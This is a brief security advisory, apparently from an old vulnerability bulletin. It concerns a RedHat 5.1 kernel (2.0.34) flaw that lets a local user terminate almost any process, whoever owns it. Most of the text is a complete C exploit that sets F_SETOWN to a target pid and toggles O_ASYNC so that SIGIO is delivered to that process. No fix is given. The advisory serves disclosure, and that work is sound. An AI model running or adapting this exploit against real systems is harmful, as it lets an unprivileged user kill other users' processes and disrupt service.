COMMAND

    kernel

SYSTEMS AFFECTED

    RedHat 5.1 (others?)

PROBLEM

    Ryan Dibble found  following.  The  code below will  result in the
    termination of almost any process no matter who owns it.  The good
    news is  that init,  kflushd, kswapd,  and klogd  appear not to be
    effected.  In order to run this the user must have login access to
    the machine.  This code has been tested on two different  machines
    running RedHat 5.1 with the following packages:

        kernel-2.0.34-0.6
        glibc-2.0.7-13
        glib-1.0.1-2
        glibc-debug-2.0.7-13
        glibc-devel-2.0.7-13
        glibc-profile-2.0.7-13

    Exploit follows:

    #include <fcntl.h>
    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(int argc, char *argv[]) {
      int s, p;
      if (argc != 2) {
        fputs("Please specify a pid to send signal to.\n", stderr);
        exit(0);
      } else {
        p = atoi(argv[1]);
      }
      fcntl(0,F_SETOWN,p);
      s = fcntl(0,F_GETFL,0);
      fcntl(0,F_SETFL,s|O_ASYNC);
      printf("Sending SIGIO - press enter.\n");
      getchar();
      fcntl(0,F_SETFL,s&~O_ASYNC);
      printf("SIGIO send attempted.\n");
      return 0;
    }

SOLUTION

    Nothing yet.